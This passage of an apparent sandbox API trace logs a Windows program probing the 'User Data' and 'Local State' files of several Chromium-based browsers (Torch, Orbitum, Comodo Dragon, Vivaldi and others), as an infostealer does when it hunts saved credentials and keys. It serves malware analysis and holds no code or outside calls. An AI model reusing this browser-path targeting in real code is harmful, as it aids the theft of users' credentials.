nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.101] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.101] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.101] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.101] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.101] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.101] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.102] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.102] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.102] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.102] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.102] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.102] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.102] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.102] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.102] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.102] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.102] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.102] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.103] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.103] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.103] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.103] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.103] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.103] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.103] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.103] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.103] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.103] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.103] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.103] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.103] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.104] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.104] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*") returned 55 [0207.104] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.105] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.106] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Orbitum\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data" [0207.106] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data" [0207.106] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Local State" [0207.106] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\orbitum\\user data\\local state")) returned 0xffffffff [0207.106] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\*") returned 55 [0207.106] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x740061, ftCreationTime.dwLowDateTime=0x65, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.107] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.108] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Comodo\\Dragon\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data" [0207.108] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data" [0207.108] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Local State" [0207.108] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comodo\\dragon\\user data\\local state")) returned 0xffffffff [0207.108] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\*") returned 61 [0207.108] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x2000002, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0xa60002a4, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9090101, dwReserved1=0x0, cFileName="", cAlternateFileName="\x04Ó\x19")) returned 0xffffffff [0207.109] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.109] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Nichrome\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data" [0207.109] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data" [0207.109] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Local State" [0207.109] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\nichrome\\user data\\local state")) returned 0xffffffff [0207.110] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\*") returned 56 [0207.110] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x610074, ftCreationTime.dwLowDateTime=0x650074, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.110] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.111] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Maxthon5\\Users" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users" [0207.111] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users" [0207.111] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\Local State" [0207.111] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\maxthon5\\users\\local state")) returned 0xffffffff [0207.111] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\*") returned 52 [0207.111] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.112] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.112] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Sputnik\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data" [0207.112] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data" [0207.113] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\Local State" [0207.113] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\sputnik\\user data\\local state")) returned 0xffffffff [0207.113] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\*") returned 55 [0207.113] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x740061, ftCreationTime.dwLowDateTime=0x65, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.113] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.114] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Epic Privacy Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data" [0207.114] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data" [0207.114] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Local State" [0207.114] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\epic privacy browser\\user data\\local state")) returned 0xffffffff [0207.114] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\*") returned 68 [0207.114] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x610044, ftCreationTime.dwLowDateTime=0x610074, ftCreationTime.dwHighDateTime=0x4c005c, ftLastAccessTime.dwLowDateTime=0x63006f, ftLastAccessTime.dwHighDateTime=0x6c0061, ftLastWriteTime.dwLowDateTime=0x530020, ftLastWriteTime.dwHighDateTime=0x610074, nFileSizeHigh=0x650074, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.115] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.115] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Vivaldi\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data" [0207.115] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data" [0207.115] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Local State" [0207.115] 